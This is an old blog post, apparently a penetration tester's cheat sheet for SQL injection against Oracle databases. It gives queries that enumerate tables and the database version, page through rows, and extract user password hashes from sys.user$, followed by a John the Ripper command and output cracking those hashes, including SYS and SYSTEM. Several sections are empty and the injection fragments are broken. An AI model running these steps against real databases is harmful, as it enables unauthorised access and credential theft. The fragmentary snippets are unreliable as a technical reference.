SQL Injection In Oracle

July 11, 2007

1. Finding table names

select table_name from+user_tables



Blind Injection: and


where rownum=1),1,1))>100


2. Iterating through the different rows:

Unfortunately it is not as straight forward, there is no LIMIT command in oracle.

Syntax:-select column_1, column_2 from (select rownum r_, column_1,

column_2  from table_1, table_2  where field_3 =

'some value')where r_ =2





3. Finding column names:



4. Finding Version:

Select banner from v$version


5. Finding  Database user names:-



6. Finding password  hashes (the user in connection string should be a dba):

select name,astatus, password from sys.user$ where astatus =0;

<# a status =0 indicates only the users who are not locked)



In the above example: i had only one column to select a string from database, so i had concatenated the

username and password field together separated with '–'.


7. Cracking passwords using john the ripper:-

thanks to pentestmonkey for this

$ ./john –rules –wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt–format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])DIP              (DIP)ORACLE           (FLOWS_020100)ORACLE           (FLOWS_FILES)ORACLE           (XDB)ORACLE           (CTXSYS)PASSWORD         (HR)PASSWORD         (SYSTEM)PASSWORD         (SYS)TEST             (TEST2)TEST1            (TEST1)
what else you want from a SQL Injection Furious

SQL Injection In Ingres

SQL Injection In DB2


Leave a Reply

Your email address will not be published. Required fields are marked *